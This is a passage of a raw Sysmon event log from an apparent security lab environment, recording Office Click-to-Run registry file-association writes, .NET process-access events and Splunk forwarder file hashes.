13241300x800000000000000075645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ODCfile\shell\EditText\command\(Default)%%SystemRoot%%\System32\notepad.exe "%%1" 13241300x800000000000000075644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ODCfile\shell\Edit\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE /y 13241300x800000000000000075643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ODCfile\shell\Analyze\ddeexec\(Default)(Empty) 13241300x800000000000000075642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ODCfile\shell\Analyze\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE "%%1" 13241300x800000000000000075641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Chart\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Chart\shell\Print\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE /q "%%1" 13241300x800000000000000075639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Chart\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Chart\shell\Open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE "%%1" 10341000x800000000000000075637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.139{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE6-607E-250D-00000000BB01}5852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Chart.8\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Chart.8\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 10341000x800000000000000075634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.123{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE6-607E-250D-00000000BB01}5852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:42.123{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE6-607E-250D-00000000BB01}5852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Chart.8\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Chart.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Chart.8\shell\New\ddeexec\(Default)(Empty) 13241300x800000000000000075629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Chart.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "%%1" 13241300x800000000000000075628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.WebQuery\shell\edit\ddeexec\topic\(Default)system 13241300x800000000000000075627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.WebQuery\shell\edit\ddeexec\(Default)[new()][newwebquery?("%%1")] 13241300x800000000000000075626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.WebQuery\shell\edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /w "%%1" 13241300x800000000000000075625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Workspace\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Workspace\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Workspace\shell\New\ddeexec\(Default)(Empty) 13241300x800000000000000075622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Workspace\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "%%1" 13241300x800000000000000075621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\ViewProtected\ddeexec\(Default)(Empty) 13241300x800000000000000075620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vp "%%1" 13241300x800000000000000075619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\Printto\ddeexec\(Default)(Empty) 13241300x800000000000000075618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" /j "%%2" 13241300x800000000000000075617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 13241300x800000000000000075615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\OpenAsReadOnly\ddeexec\(Default)(Empty) 13241300x800000000000000075614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /h "%%1" 13241300x800000000000000075613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\New\ddeexec\(Default)(Empty) 13241300x800000000000000075610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "%%1" 13241300x800000000000000075609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vu "%%1" 13241300x800000000000000075608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.030{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\ViewProtected\ddeexec\(Default)(Empty) 13241300x800000000000000075607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.030{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vp "%%1" 13241300x800000000000000075606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.030{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\Printto\ddeexec\(Default)(Empty) 13241300x800000000000000075605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.030{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" /j "%%2" 13241300x800000000000000075604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 13241300x800000000000000075602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\OpenAsReadOnly\ddeexec\(Default)(Empty) 13241300x800000000000000075601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /h "%%1" 13241300x800000000000000075600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:42.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\New\ddeexec\(Default)(Empty) 13241300x800000000000000075597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "%%1" 13241300x800000000000000075596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\Edit\ddeexec\(Default)(Empty) 13241300x800000000000000075595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.TemplateMacroEnabled\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vu "%%1" 23542300x800000000000000050310Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:42.489{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D49661ECCBEDC2330C7A94E693035BC,SHA256=6FC0CBCE2D2492F782DF6FD0782A6ACB9627D59BB525D9F8E98BE6A5437C5CC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050309Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:42.052{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F3F30AD0914442B817A69E46CA14096,SHA256=F3E9B5021A26FBE76D3174CE34E97510E4090EB7FD4B2154F9734391166BCBED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.983{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE7-607E-370D-00000000BB01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.983{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ma-filelink\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 10341000x800000000000000075930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.967{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE7-607E-370D-00000000BB01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.967{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE7-607E-370D-00000000BB01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\conf\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000075927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\im\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000075926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\callto\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000075925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Lync15\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 10341000x800000000000000075924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 